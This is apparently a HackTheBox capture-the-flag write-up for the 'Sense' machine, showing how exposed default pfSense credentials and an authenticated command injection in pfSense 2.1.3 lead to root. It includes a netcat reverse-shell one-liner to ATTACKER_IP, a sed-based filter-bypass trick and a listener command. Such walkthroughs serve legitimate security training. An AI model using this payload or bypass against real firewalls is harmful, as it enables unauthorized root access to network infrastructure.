Sense is a pfSense firewall appliance vulnerable to an authentication bypass and remote command execution. By enumerating publicly accessible configuration files, default credentials are recovered. Once authenticated, a known pfSense 2.1.3 vulnerability provides a root shell.
Target: sense.htb
Initial vector: exposed configuration file → default pfSense credentials
Privilege escalation: pfSense 2.1.3 RCE → root
Nmap:
22/tcp ssh 80/tcp http (pfSense login page)
The web interface is pfSense. Directory fuzzing reveals a sensitive file:
/system-users.txt
This file contains default pfSense credentials:
admin : pfsense
Login at:
http://sense.htb/
Once inside the dashboard, the version is visible:
pfSense 2.1.3
This version is vulnerable to an authenticated RCE (searchsploit).
Use the public exploit (e.g. exploit‑db 43560 or similar).
The exploit abuses the diag_ping.php page to inject commands.
Example usage:
$ python3 exploit.py -u admin -p pfsense -t http://sense.htb
A root shell is obtained immediately because pfSense runs the web interface as root.
pfSense filters special characters, but the filter can be bypassed by replacing them with variables and using
sed to reconstruct the payload.
Example transformation:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 443 >/tmp/f" \
| sed 's/\//${HOME}/g' \
| sed 's/-/${guion}/g' \
| sed 's/&/${ampersand}/g'
This produces a payload that bypasses pfSense’s input filters and still executes a reverse shell.
Listener:
$ nc -nlvp 443
Trigger the payload through the ping diagnostic page and a root shell is returned.
pfSense’s web interface runs as root, so no privilege escalation is required. Once RCE is achieved, the shell is already root.
Sense is a straightforward pfSense exploitation machine: exposed configuration files reveal default credentials, and pfSense 2.1.3 provides a trivial authenticated RCE path. Because pfSense executes web commands as root, full system compromise is immediate.